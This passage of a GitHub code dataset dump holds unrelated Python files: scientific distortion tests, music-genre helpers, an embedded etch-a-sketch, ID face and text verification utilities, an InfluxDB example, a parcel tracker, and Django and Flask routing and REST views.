out_[ql4, :] = in_[ql4] + np.tile(params[6:8], (sum(ql4), 1))\n        return\n\n    def _dexela_2923_inverse_distortion(out_, in_, params):\n        ql = _find_quadrant(in_)\n        ql1 = ql == 1\n        ql2 = ql == 2\n        ql3 = ql == 3\n        ql4 = ql == 4\n        out_[ql1, :] = in_[ql1] - np.tile(params[0:2], (sum(ql1), 1))\n        out_[ql2, :] = in_[ql2] - np.tile(params[2:4], (sum(ql2), 1))\n        out_[ql3, :] = in_[ql3] - np.tile(params[4:6], (sum(ql3), 1))\n        out_[ql4, :] = in_[ql4] - np.tile(params[6:8], (sum(ql4), 1))\n        return\n\n\n\ndef test_disortion():\n    pts = np.random.randn(16, 2)\n    qi = _find_quadrant(pts)\n\n    # test trivial\n    params = np.zeros(8)\n    dc = Dexela_2923(params)\n    if not np.all(dc.apply(pts) - pts == 0.):\n        raise RuntimeError(\"distortion apply failed!\")\n    if not np.all(dc.apply_inverse(pts) - pts == 0.):\n        raise RuntimeError(\"distortion apply_inverse failed!\")\n\n    # test non-trivial\n    params = np.random.randn(8)\n    dc = Dexela_2923(params)\n    ptile = np.vstack([params.reshape(4, 2)[j - 1, :] for j in qi])\n    result = dc.apply(pts) - pts\n    result_inv = dc.apply_inverse(pts) - pts\n    if not np.all(abs(result - ptile) <= constants.epsf):\n        raise RuntimeError(\"distortion apply failed!\")\n    if not np.all(abs(result_inv + ptile) <= constants.epsf):\n        raise RuntimeError(\"distortion apply_inverse failed!\")\n    return True\n","repo_name":"HEXRD/hexrd","sub_path":"hexrd/distortion/dexela_2923.py","file_name":"dexela_2923.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"}
{"seq_id":"23772572941","text":"def get_playlist_artists(playlist_items_list):\n    # 플레이리스트가 갖고있는 곡들의 json 데이터 배열을 입력하면 해당 플리의 아티스트 리스트를 리턴\n    appear_artists = []\n    \n    for d in playlist_items_list:\n        for artist in d['track']['artists']:\n            appear_artists.append(artist['name'])\n    \n    #appear_artists = list(set(appear_artists))\n    return appear_artists\n\ndef get_artist_genres(artist_name, origin_data):\n    # 아티스트 이름과 원본 데이터를 입력하면 장르를 출력\n    for d in origin_data:\n        if d['artist_name'] == artist_name:\n            if 'genres' in d:\n                return d['genres']\n            else: return []\n\ndef get_playlist_genres(appear_artists, origin_data):\n    # 플레이리스트가 갖고있는 곡들의 아티스트 배열을 입력하면 해당 플리의 장르 리스트를 리턴\n    genre_list = []\n    for artist in appear_artists:\n        genres = get_artist_genres(artist, origin_data)\n        if genres:\n            for g in genres:\n                genre_list.append(g)\n\n    return genre_list\n\ndef genre_counter(genre_list):\n    # 장르가 등장한 빈도가 담긴 리스트를 출력\n    genres = list(set(genre_list)) # genres는 중복을 제거한 리스트\n    genre_count = []\n    \n    for g in genres:\n        genre_count.append([g, genre_list.count(g)])\n    \n    return genre_count","repo_name":"JoMars0722/capstone2","sub_path":"backend/playlist_artists_genres.py","file_name":"playlist_artists_genres.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"35644349940","text":"#!/usr/bin/env python3\n\"\"\"\nMade by Brendan Mulholland\nECE 434- HW #3\n\"\"\"\n\nfrom Adafruit_BBIO.Encoder import RotaryEncoder, eQEP2, eQEP1\nimport time\nimport smbus\n\n\n\n\ndef clearBoard():\n    global board\n    global playerX\n    global playerY\n    \n    board = [ [0] * 8 for _ in range(8)]\n    board[playerX][playerY] = 1\n    \n    displayBoard()\n    \n    \ndef displayBoard():\n    \n    global VertMatrix\n    global red\n    global matrix\n    \n    PosMatrix = [0x00,0x02,0x04,0x06,0x08,0x0A,0x0C,0x0E]\n    \n    green = [0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]\n    \n    for i in range(8):\n        for j in range(8):\n            green[i] += board[i][j] * VertMatrix[j]\n    \n    for i in range(8):\n        bus.write_i2c_block_data(matrix,PosMatrix[i],[green[i],red[i]])\n\n\n    \ndef clamp(n, minn, maxn):\n    return max(min(maxn, n), minn) \n\n\ndef main():\n    \n    global playerX\n    global playerY\n    global board\n    global encoder1\n    global encoder2\n    global red\n    global VertMatrix\n    \n    vertPos = 0\n    horiPos = 0\n    \n    while True:\n        time.sleep(.5)\n        \n        \n        oldPlayerX = playerX\n        oldPlayerY = playerY\n        \n        \n        temp = bus.read_byte_data(address, 0)\n        \n        if(temp >= 26):\n            clearBoard()\n        \n        \n        if(encoder1.position < horiPos):\n            playerX += 1\n        elif(encoder1.position > horiPos):\n            playerX += -1\n        elif(encoder2.position < vertPos):\n            playerY += 1\n        elif(encoder2.position > vertPos):\n            playerY += -1\n        \n        \n        horiPos = encoder1.position\n        vertPos = encoder2.position\n        \n        playerX = clamp(playerX,0,7)\n        playerY = clamp(playerY,0,7)\n        \n        \n        \n        \n        red[oldPlayerX] = red[oldPlayerX] - VertMatrix[oldPlayerY]\n        red[playerX] = red[playerX] + VertMatrix[playerY]\n        \n        if(oldPlayerX != playerX or oldPlayerY != playerY):\n            board[playerX][playerY] = 1\n        \n        \n        displayBoard()\n        \n        \n\n    \n\n\nif __name__ == \"__main__\":\n    \"\"\" This is executed when run from the command line \"\"\"\n    #This is the size of the board and the init player location\n    \n    \n\n    playerX = 4\n    playerY = 4\n    \n\n    \n    bus = smbus.SMBus(2)\n    address = 0x48\n    matrix = 0x70  # Use address 0x70\n    \n    bus.write_byte_data(matrix, 0x21, 0)   # Start oscillator (p10)\n    bus.write_byte_data(matrix, 0x81, 0)   # Disp on, blink off (p11)\n    bus.write_byte_data(matrix, 0xe7, 0)   # Full brightness (page 15)\n    \n    \n    \n    \n    \n    VertMatrix = [0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80]\n    \n    \n    board = 0\n    \n    #green = [0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]\n    red = [0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]\n    \n    \n    #greenboard = [ [0] * 8 for _ in range(8)]\n    \n\n    \n    #This initialized the board to null and then adds the player's location\n    clearBoard()\n    \n    #This sets up the encoders to zero\n    encoder1 = RotaryEncoder(eQEP1)\n    encoder2 = RotaryEncoder(eQEP2)\n    encoder1.setAbsolute()\n    encoder2.setAbsolute()\n    encoder1.enable()\n    encoder2.enable()\n    \n    red[playerX] = red[playerX] + VertMatrix[playerY]\n    board[playerX][playerY] = 1\n    \n    main()\n","repo_name":"BrendanTB5/Embeded-Linux","sub_path":"hw03/etchasketch.py","file_name":"etchasketch.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"32954395576","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport base64\nimport cv2\nimport datetime\n\nfrom mocr import face_detection\nfrom mocr import TextRecognizer\nfrom nerd import ner\n\nfrom facereg import face_encoder, recognize_faces\n\nfrom graphvl import crud\nfrom graphvl.db.session import db_session\nfrom graphvl.models.image import ImageCreate, ImageType\nfrom graphvl.db_models.models import User\n\nfrom re import search\nfrom typing import List, Tuple, Dict\n\n\neast_path = (\n    os.getcwd()\n    + \"/graphvl\"\n    + \"/\"\n    + \"text_detection_model/frozen_east_text_detection.pb\"\n)\n\n\ndef create_image_file(user_id: str, image_type: ImageType) -> Tuple[str, str]:\n    image = crud.image.get(db_session, user_id=user_id, image_type=ImageType.identity)\n    if image:\n        photo_data = base64.b64decode(image.image_str)\n\n        if image_type == ImageType.identity:\n            path = \"identity/\"\n        else:\n            path = \"profile/\"\n\n        directory = os.getcwd() + \"/testsets/\" + path + user_id + \"/\"\n        if not os.path.exists(directory):\n            os.makedirs(directory)\n        file_path = directory + \"image\" + \".jpg\"\n        with open(file_path, \"wb\") as f:\n            f.write(photo_data)\n\n        # detect face from identity image\n        face_image_path = None\n        if image_type == ImageType.identity:\n            face_image = face_detection.detect_face(file_path)\n            face_directory = os.getcwd() + \"/testsets/\" + \"face/\" + user_id + \"/\"\n            if not os.path.exists(face_directory):\n                os.makedirs(face_directory)\n            face_image_path = face_directory + \"image.jpg\"\n            cv2.imwrite(face_image_path, face_image)\n        return (file_path, face_image_path)\n    else:\n        return (None, None)\n\n\ndef get_texts(user_id: str) -> str:\n    image_path = (\n        os.getcwd() + \"/testsets/\" + \"identity\" + \"/\" + user_id + \"/\" + \"image.jpg\"\n    )\n    text_recognizer = TextRecognizer(image_path, east_path)\n    (image, _, _) = text_recognizer.load_image()\n    (resized_image, ratio_height, ratio_width, _, _) = text_recognizer.resize_image(\n        image, 320, 320\n    )\n    (scores, geometry) = text_recognizer.geometry_score(east_path, resized_image)\n    boxes = text_recognizer.boxes(scores, geometry)\n    results = text_recognizer.get_results(boxes, image, ratio_height, ratio_width)\n    if results:\n        texts = \"\"\n        for text_bounding_box in results:\n            text = text_bounding_box[1]\n            texts += text + \" \"\n        return texts\n    return \"\"\n\n\ndef create_user_text_label(user: User) -> Dict:\n    user_text_label = {\n        \"PERSON\": [user.name, user.surname],\n        \"DATE\": user.date_of_birth,\n        \"GPE\": user.country,\n    }\n    return user_text_label\n\n\ndef get_doc(texts: str, language: str) -> List[Tuple[str, str]]:\n    try:\n        doc = ner.name(texts, language=language)\n        text_label = [(X.text, X.label_) for X in doc]\n        return text_label\n    except:\n        return None\n\n\ndef point_on_texts(text: str, value: str) -> float:\n    if isinstance(value, datetime.date):\n        value = value.strftime(\"%d/%m/%Y\")\n\n    val_len = len(value)\n    text_len = len(text)\n    if text_len > val_len:\n        match = search(value, text)\n    else:\n        match = search(text, value)\n    point = 0.0\n    if match:\n        (start, end) = match.span()\n        point = float(((1.0 * (end - start)) / val_len) / 4)\n    return point\n\n\ndef validate_text_label(text_label: List, user_text_label: str) -> float:\n    result = 0\n    for (text, label) in text_label:\n        if label in user_text_label:\n            value = user_text_label[label]\n            # check for name and surname\n            if isinstance(value, list):\n                for val in value:\n                    result += point_on_texts(text, val)\n            else:\n                result += point_on_texts(text, value)\n    return result\n\n\ndef recognize_face(user_id: str) -> List:\n    datasets_path = os.getcwd() + \"/testsets/identity/\" + user_id\n    encodings_path = os.path.dirname(os.path.realpath(__file__)) + \"/encodings.pickle\"\n    face_encoder.encode_faces(\n        datasets=datasets_path, encodings=encodings_path, detection_method=\"cnn\"\n    )\n    image_path = os.getcwd() + \"/testsets/face/\" + user_id + \"/\" + \"image.jpg\"\n    names = recognize_faces.recognize(\n        image_path,\n        datasets=datasets_path,\n        encodings=encodings_path,\n        detection_method=\"cnn\",\n    )\n    return names\n\n\ndef point_on_recognition(names: List, user_id: str) -> float:\n    point = 0.0\n    if not names:\n        point = 0.0\n        return point\n    if len(names) > 1:\n        for name in names:\n            if name == user_id:\n                point = 0.25\n    else:\n        if names[0] == user_id:\n            point = 0.25\n    return point\n","repo_name":"verifid/graph-vl","sub_path":"graphvl/utils/verification_utils.py","file_name":"verification_utils.py","file_ext":"py","file_size_in_byte":4808,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"}
{"seq_id":"28901620241","text":"\n\ndef doNext(coins, numberLeft):\n    if numberLeft == 0:\n        return 1\n    leftCopy = numberLeft\n    coinCopy = coins.copy()\n    try:\n        current = coinCopy.pop(0)\n    except IndexError:\n        return 0\n    summation = 0\n    while leftCopy >= 0:\n        summation += doNext(coinCopy, leftCopy)\n        leftCopy -= current\n    return summation\n\n\nif __name__ == '__main__':\n\n    lookingFor = 200\n\n    coins = [1, 2, 5, 10, 20, 50, 100, 200]\n\n    num = doNext(coins, lookingFor)\n    print(num)\n","repo_name":"msg430/Project-Euler","sub_path":"problem31.py","file_name":"problem31.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"29084088318","text":"from influxdb_client import Point, InfluxDBClient\nfrom influxdb_client.client.util.date_utils_pandas import PandasDateTimeHelper\nfrom influxdb_client.client.write_api import SYNCHRONOUS\n\n\"\"\"\nSet PandasDate helper which supports nanoseconds.\n\"\"\"\nimport influxdb_client.client.util.date_utils as date_utils\n\ndate_utils.date_helper = PandasDateTimeHelper()\n\n\"\"\"\nPrepare client.\n\"\"\"\nwith InfluxDBClient(url=\"http://localhost:8086\", token=\"my-token\", org=\"my-org\") as client:\n\n write_api = client.write_api(write_options=SYNCHRONOUS)\n \"\"\"\n Prepare data\n \"\"\"\n\n point = Point(\"h2o_feet\") \\\n .field(\"water_level\", 10) \\\n .tag(\"location\", \"pacific\") \\\n .time('1996-02-25T21:20:00.001001231Z')\n\n print(f'Time serialized with nanosecond precision: {point.to_line_protocol()}')\n print()\n\n write_api.write(bucket=\"my-bucket\", record=point)\n\n query_api = client.query_api()\n\n \"\"\"\n Query: using Stream\n \"\"\"\n query = '''\n from(bucket:\"my-bucket\")\n |> range(start: 0, stop: now())\n |> filter(fn: (r) => r._measurement == \"h2o_feet\")\n '''\n records = query_api.query_stream(query)\n\n for record in records:\n print(f'Temperature in {record[\"location\"]} is {record[\"_value\"]} at time: {record[\"_time\"]}')\n\n","repo_name":"influxdata/influxdb-client-python","sub_path":"examples/nanosecond_precision.py","file_name":"nanosecond_precision.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"72"} +{"seq_id":"72088381673","text":"import requests\nimport time\n\nuser_agent = \"com.pttxd\"\ninternational_link = \"https://pttws.ptt.gov.tr/cepptt/mssnvrPttaceaemaa/gonderitakipvepostakod/yurtDisiKargoSorgulaMSAEHPREMHMRGBAGDOGMAMA\"\ngeneral_link = \"https://pttws.ptt.gov.tr/cepptt/mssnvrPttaceaemaa/gonderitakipvepostakod/gonderisorgu2MSAEHPREMHMRGBAGDOGMAMA\"\nbarcodes = {\"BR123456789CD\": \"Left side is barcode code, right is name\", \"BR987654321CD\": \"you can put as many as you like\"}\n\nheaders = {\n 'User-Agent': user_agent,\n}\n\nwhile 1:\n\tfor barcode in barcodes.keys():\n\t\tr = requests.post(international_link, data = {'barkod': barcode}, headers = headers)\n\t\trj = r.json()\n\t\tevents = rj[\"dongu\"]\n\t\tif len(events) != 0:\n\t\t\tprint(\"Info for {}:\\n\".format(barcodes[barcode]))\n\t\t\tfor event in events:\n\t\t\t\ttext = \"{} on {}\".format(event[\"event\"], event[\"tarih\"])\n\t\t\t\tif 'ofis' in event:\n\t\t\t\t\ttext += \" at {}\".format(event[\"ofis\"])\n\t\t\t\tprint(text)\n\t\t\tprint(\"---\")\n\ttime.sleep(60*5)\n","repo_name":"aveao/PTT-API","sub_path":"PTTTrack.py","file_name":"PTTTrack.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"3235716734","text":"# -*- coding: utf-8 -*-\r\nfrom django.conf.urls import *\r\n\r\nimport views\r\nimport order_api_views\r\nimport messages_view\r\nimport api_views\r\nimport order_static_api_views\r\nimport sales_api_views\r\n\r\nurlpatterns = patterns('',\r\n\t(r'^$', views.app_login),\r\n\t(r'^logout/$', views.app_logout),\r\n\t(r'^main/$', views.app_main),\r\n\t(r'^messages/$',views.list_messages),\r\n\t(r'^messages/session_history/show/(\\d*)$', views.get_session_histories),\r\n\t(r'^messages/reply/$', views.reply_session),\r\n\t(r'^order/$',views.list_orders),\r\n\t(r'^order_detail/(\\d+)/$',views.order),\r\n\t(r'^show_index/$', 
api_views.show_index),\r\n\t#APIs for fetching data\r\n\t(r'^api/order_list/get/$', order_api_views.get_order_list),\r\n\t(r'^api/order/get/$', order_api_views.get_order),\r\n\t(r'^api/order_express_name/get/$', order_api_views.get_order_express_name),\r\n\t(r'^api/express_info/add/$',order_api_views.add_express_info),\r\n\t(r'^api/order_status/update/$',order_api_views.update_order_status),\r\n\t(r'^new_base/$',views.new_base),\r\n\t(r'^api/messages/$',messages_view.list_messages),\r\n\t(r'^api/messages/session_history/$', messages_view.get_session_histories),\r\n\t(r'^api/messages/reply/$', messages_view.reply_session),\r\n\t(r'^api/messages/get_unread_count/$', messages_view.get_realtime_unread_count),\r\n\t(r'^api/messages/send_media/$', messages_view.send_media),\r\n\t(r'^api/messages/send_mui_media/$', messages_view.send_mui_media),\r\n\t(r'^api/order_daily_trend/get/$', api_views.get_order_daily_trend),\r\n\t(r'^api/sale_daily_trend/get/$', api_views.get_sale_daily_trend),\r\n\t(r'^api/visit_daily_trend/get/$', api_views.get_visit_daily_trend),\r\n\t(r'^api/message_daily_trend/get/$', api_views.get_message_daily_trend),\r\n\t(r'^api/yesterday_count_trend/get/$', api_views.get_yesterday_count_trend),\r\n\t(r'^api/yesterday_price_trend/get/$', api_views.get_yesterday_price_trend),\r\n\t(r'^api/login/get/$', api_views.get_login),\r\n\t(r'^api/logout/get/$', api_views.get_logout),\r\n\t(r'^api/version/check/$', api_views.check_version),\r\n\r\n\t(r'^api/buy_trend/get/$', api_views.get_buy_trend),#(used in version 2.0)\r\n\t(r'^api/daily_message_trend/get/$', api_views.get_daily_message_trend),#(used in version 2.0)\r\n\t(r'^get_index_html/$', api_views.get_index_html),\r\n\r\n\t#data statistics\r\n\t(r'^api/order_statistic/order_by_pay_type/get/$',order_static_api_views.get_order_by_pay_type),\r\n\t(r'^api/order_statistic/order_by_product/get/$',order_static_api_views.get_order_by_product),\r\n\t(r'^api/order_statistic/order_by_source/get/$',order_static_api_views.get_order_by_source),\r\n\t(r'^api/order_statistic/user_source_by_day/get/$',order_static_api_views.get_user_source_by_day),\r\n\t(r'^api/order_statistic/user_source_by_week/get/$',order_static_api_views.get_user_source_by_week),\r\n\t(r'^api/order_statistic/user_static/get/$',order_static_api_views.get_user_static),\r\n\r\n\t(r'^api/order_statistic/order_by_day/get/', sales_api_views.get_order_by_day),\r\n\t(r'^api/order_statistic/order_by_week/get/', sales_api_views.get_order_by_week),\r\n\t(r'^api/order_statistic/order_by_month/get/', sales_api_views.get_order_by_month),\r\n\t(r'^api/order_statistic/order_by_status/get/', sales_api_views.get_order_by_status),\r\n\r\n\t(r'^api/mui/messages/$', messages_view.mui_list_messages),\r\n\t(r'^api/mui/messages/session_history/$', messages_view.mui_get_session_histories),\r\n\t(r'^api/mui/messages/additional_history/$', messages_view.mui_get_additional_histories),\r\n\r\n    #newly added data dashboard\r\n \t(r'^api/stats/brand_value/$', api_views.brand_value),\r\n    (r'^api/stats/overview_board/$',api_views.overview_board),\r\n    (r'^api/stats/order_value/$', api_views.order_value),\r\n    (r'^api/stats/sales_chart/get/$', api_views.sales_chart),\r\n\r\n)\r\n","repo_name":"chengdg/weizoom","sub_path":"weapp/mobile_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"22127985036","text":"import pickle as p\nimport time as t\n\ndef xyz(d):\n    f=open(\"f:/venom.dat\", \"ab\")\n    p.dump(d,f)\n    print(\"your data is being recorded . . 
.\")\n t.sleep(2)\n print(\"data successfully recorded!\")\n f.close()\n\n#main_section\ndata={}\nwhile True:\n print(\" press 1 to enter the no. of lines to generate : :\")\n print(\" press 2 to show the output : :\")\n op= int(input(\"enter your option : \"))\n if op==1:\n w=int(input(\"enter the required no. of lines : \"))\n q=input(\"enter odd/even progression : \")\n for i in range(w):\n for j in range(i):\n print()\n \n \n","repo_name":"SHERLOCKx90/Python-Programming","sub_path":"random_pattern_generation.py","file_name":"random_pattern_generation.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16308172543","text":"num_students = int(input())\nstudents = []\n\nfor i in range(num_students) :\n input_data = input().split()\n students.append( (input_data[0], input_data[1]) )\n\nstudents.sort(key = lambda data : data[1])\n\nprint(\"students :\", students)\n\nfor i in students :\n print(i[0], end= '\\n')","repo_name":"pss4190/CAU_CODES","sub_path":"6_정렬/3-grade_printing.py","file_name":"3-grade_printing.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5027313411","text":"#!/usr/bin/python3\n\nimport os\n\nfrom flask_script import Manager, Shell, Command\n\nfrom app import create_app\n\napp = create_app(os.environ.get('FLASK_CONFIG') or 'default')\nmanager = Manager(app)\n\n\ndef make_shell_context():\n\treturn dict(app=app)\n\n\n# As with the Command class, the docstring you use for the function will appear when you run with the -? or --help option:\nclass Hello(Command):\n\t\"prints hello world\"\n\n\tdef run(self):\n\t\tprint(\"hello world\")\n\n\nmanager.add_command(\"shell\", Shell(make_context=make_shell_context))\nmanager.add_command(\"hello\", Hello())\n\nif __name__ == '__main__':\n\tmanager.run()\n","repo_name":"chengdanhao/BitBoxServer","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24333316974","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\nfrom . 
import views\n\nurlpatterns = [\n    # create workflow step by step\n    url(r'^workflow/$', views.WorkflowListView.as_view()),\n    url(r'^workflow/(?P[0-9]+)$', views.WorkflowDetailView.as_view(), name=\"template-detail\"),\n    url(r'^workflow/(?P[0-9]+)/state/$', views.StateListView.as_view(), name='template-states'),\n    url(r'^state/(?P[0-9]+)$', views.StateDetailView.as_view()),\n    url(r'^workflow/(?P[0-9]+)/transition/$', views.TransitionListView.as_view(), name='template-transitions'),\n    url(r'^transition/(?P[0-9]+)$', views.TransitionDetailView.as_view()),\n\n    # create workflow at a time\n    url(r'^workflow/whole/$', views.WorkflowWholeparameterView.as_view()),\n    url(r'^workflow/file/$', views.WorkflowFileView.as_view()),\n    \n    # change status of workflow\n    url(r'^workflow/(?P[0-9]+)/status/$', views.WorkflowStatusView.as_view(), name='template-status'),\n    \n    # workflow preview\n    url(r'^workflow/(?P[0-9]+)/png/$', views.WorkflowDetailPngView.as_view(), name=\"template-png\"),\n\n\n    url(r'^workflowactivity/$', views.WorkflowActivityListView.as_view()),\n    url(r'^workflowactivity/(?P[0-9]+)$', views.WorkflowActivityDetailView.as_view(), name=\"instance-detail\"),\n    \n    url(r'^workflowactivity/(?P[0-9]+)/state/(?P[0-9]+)$', views.WorkflowActivityStateDetailView.as_view()),\n    \n    url(r'^workflowactivity/(?P[0-9]+)/commit/$', views.WorkflowActivityCommitView.as_view(), name='instance-commit'),\n    url(r'^workflowactivity/(?P[0-9]+)/start/$', views.WorkflowActivityStartView.as_view(), name='instance-start'),\n    url(r'^workflowactivity/(?P[0-9]+)/logevent/$', views.WorkflowActivityLogeventView.as_view(), name='instance-logevent'),\n    url(r'^workflowactivity/(?P[0-9]+)/abolish/$', views.WorkflowActivityAbolishView.as_view(), name='instance-abolish'),\n    url(r'^workflowactivity/(?P[0-9]+)/delegate/$', views.WorkflowActivityDelegateView.as_view(), name='instance-delegate'),\n    url(r'^workflowactivity/(?P[0-9]+)/history/$', views.HistoryPngView.as_view(), name='instance-history'),\n\n    url(r'^participant-task/$', views.ParticipantTaskView.as_view()),\n\n    # url(r'^workflowactivity/(?P[0-9]+)/state/$', views.WorkflowActivityStateListView.as_view(), name='instance-states'),\n    # url(r'^workflowactivity/(?P[0-9]+)/transition/$', views.WorkflowActivityTransitionListView.as_view(), name='instance-transitions'),\n    # url(r'^workflowactivity-state/(?P[0-9]+)$', views.WorkflowActivityStateDetailView.as_view()),\n\n]","repo_name":"sarar04/django-workflow","sub_path":"WorkflowEngine/workflow/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"12427328561","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom django.views.decorators.http import require_http_methods\nfrom .models import *\nfrom django.db import models\nimport json\nimport datetime\n\nfrom .serializers import *\n# the imports below are for using APIView\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status #we need to return status codes too\nfrom django.http import Http404\nfrom rest_framework.permissions import IsAuthenticatedOrReadOnly\n\ndef hello_world(request):\n    if request.method == \"GET\":\n        return JsonResponse({\n            'status' : 200,\n            'success' : True,\n            'message' : 'Message delivered successfully!',\n            'data' : \"Hello world\",\n        })\n\n@require_http_methods([\"GET\",\"PATCH\",\"DELETE\"])\ndef post_detail(request,id):\n    if request.method == \"GET\":\n        post=get_object_or_404(Post,pk=id)\n        category_json={\n            \"id\":post.post_id,\n            \"writer\":post.writer,\n            \"content\":post.content,\n            \"category\":post.category,\n        }\n        \n        return JsonResponse({\n            'status':200,\n            'message':'Post retrieved successfully',\n            'data':category_json\n        })\n    elif request.method ==\"PATCH\":\n        body=json.loads(request.body.decode('utf-8'))\n        update_post=get_object_or_404(Post,pk=id)\n        \n        update_post.content=body['content']\n        update_post.category=body['category']\n        update_post.save()\n        \n        update_post_json={\n            \"id\":update_post.post_id,\n            \"writer\":update_post.writer,\n            \"content\":update_post.content,\n            \"category\":update_post.category,\n        }\n        return JsonResponse({\n            'status':200,\n            'message':'Post updated successfully',\n            'data':update_post_json\n        })\n    elif request.method ==\"DELETE\":\n        delete_post=get_object_or_404(Post, pk=id)\n        delete_post.delete()\n        \n        return JsonResponse({\n            'status':200,\n            'message':'Post deleted successfully',\n            'data':None\n        })\n@require_http_methods([\"GET\"])\ndef post_all(request): \n    posts=Post.objects.all()\n    category_list=[]\n    \n    for post in posts:\n        category_list.append({\n            \n            \"id\":post.post_id,\n            \"writer\":post.writer,\n            \"content\":post.content,\n            \"category\":post.category,\n            \n        })\n    return JsonResponse({\n        'status':200,\n        'message':'All posts retrieved successfully',\n        'data':category_list\n    })\n    \n@require_http_methods([\"POST\"])\ndef create_post(request):\n    body=json.loads(request.body.decode('utf-8'))\n    \n    new_post=Post.objects.create(\n        writer=body['writer'],\n        content=body['content'],\n        category=body['category']\n    )\n    \n    new_post_json={\n        \"id\":new_post.post_id,\n        \"writer\":new_post.writer,\n        \"content\":new_post.content,\n        \"category\":new_post.category\n    }\n    return JsonResponse({\n        'status':200,\n        'message':'Post created successfully',\n        'data': new_post_json\n    })\n@require_http_methods([\"GET\"])\ndef get_comment(request,post_id):\n    comments=Comment.objects.filter(post=post_id)\n    comment_json_list=[]\n    for comment in comments:\n        comment_json={\n            'writer':comment.writer,\n            'content':comment.content\n        }\n        comment_json_list.append(comment_json)\n    \n    return JsonResponse({\n        'status':200,\n        'message':'Comments retrieved successfully',\n        'data':comment_json_list\n    })\n    \n@require_http_methods([\"POST\"])\ndef create_comment(request):\n    body=json.loads(request.body.decode('utf-8'))\n    \n    comment_post_id=Post.objects.get(post_id=body[\"post_id\"])\n    \n    new_comment=Comment.objects.create(\n        post=comment_post_id,\n        writer=body[\"writer\"],\n        content=body[\"content\"]\n    )\n    \n    new_comment_json={\n        \"post\":body[\"post_id\"], #why doesn't new_comment.post or comment_post_id work here? :(\n        \"writer\":new_comment.writer,\n        \"content\":new_comment.content,\n    }\n    \n    return JsonResponse({\n        'status': 200,\n        'message':'Comment created successfully',\n        'data':new_comment_json\n    })\n    \n    \n@require_http_methods([\"GET\"])\ndef post_date(request): \n    start=datetime.date(2023,4,5)\n    end=datetime.date(2023,4,11)\n    posts=Post.objects.filter(created_at__range=(start,end))\n    post_list=[]\n    \n    for post in posts:\n        post_list.append({\n            \"id\":post.post_id,\n            \"writer\":post.writer,\n            \"content\":post.content,\n            \"category\":post.category\n        })\n    \n    return JsonResponse({\n        'status':200,\n        'message':'Posts from weeks 5-6 retrieved successfully',\n        'data':post_list\n    })\n    \n#a list view usually provides GET and POST.\nclass PostList(APIView) :\n    permission_classes=[IsAuthenticatedOrReadOnly]\n    #create a new post\n    def post(self,request,format=None):\n        serializer = PostSerializer(data=request.data) #put the request payload into data and hand it to PostSerializer\n        if serializer.is_valid(): #check the values are valid\n            serializer.save()\n            return Response(serializer.data,status=status.HTTP_201_CREATED)
\n        else:\n            return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n    #fetch info for all posts\n    def get(self,request,format=None):\n        posts=Post.objects.all()\n        #many=True is required when serializing many posts, otherwise it errors\n        serializer = PostSerializer(posts,many=True)\n        return Response(serializer.data)\n    \nclass PostDetail(APIView):\n    def get(self, request,id):\n        post=get_object_or_404(Post,id=id)\n        serializer=PostSerializer(post)\n        return Response(serializer.data)\n    #PUT replaces the whole object, PATCH only part of it\n    def put(self,request,id):\n        post=get_object_or_404(Post,id=id) #raises an Http404 error when the object does not exist\n        serializer=PostSerializer(post,data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            return Response(serializer.data)\n        else:\n            return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n    def delete(self,request,id):\n        post=get_object_or_404(Post,id=id)\n        post.delete()\n        return Response(status=status.HTTP_204_NO_CONTENT)\n    \n\n#fetch the full list of comments\nclass CommentList(APIView):\n    def get(self,request,format=None):\n        comments=Comment.objects.all()\n        serializer=CommentSerializer(comments,many=True)\n        return Response(serializer.data)\n\n#fetch comments by post\nclass PostCommentList(APIView):\n    #fetch all comments of a specific post using the post id\n    def get(self,request,key,format=None):\n        #comments=get_object_or_404(Comment,post=key)\n        comments=Comment.objects.filter(post=key)\n        serializers=CommentSerializer(comments,many=True)\n        return Response(serializers.data)\n    \n    #create a comment on a specific post using the post id\n    def post(self,request,key):\n        commentPost=Post.objects.get(id=key)\n        data=request.data\n        data[\"post\"]=key \n        